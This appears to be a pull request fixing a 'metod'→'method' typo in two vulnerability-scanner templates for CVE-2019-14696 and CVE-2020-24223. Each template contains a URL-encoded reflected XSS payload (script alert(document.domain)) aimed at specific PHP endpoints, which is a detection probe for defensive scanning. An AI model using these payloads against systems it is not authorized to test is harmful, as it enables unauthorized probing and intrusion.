### PR TITLE
Fix typo in cve-2019-14696.yaml and cve-2020-24223

### DIFF
--- a/cves/CVE-2019-14696.yaml
+++ b/cves/CVE-2019-14696.yaml
@@ -9,7 +9,7 @@ info:
 # Vendor Homepage: [https://open-school.org/]
 
 requests:
-  - metod: GET
+  - method: GET
     path:
       - '{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 

--- a/cves/CVE-2020-24223.yaml
+++ b/cves/CVE-2020-24223.yaml
@@ -10,7 +10,7 @@ info:
   # Source: https://www.exploit-db.com/exploits/48777
 
 requests:
-  - metod: GET
+  - method: GET
     path:
       - '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
     matchers-condition: and


### PR DESCRIPTION
Fix typo "metod" to "method"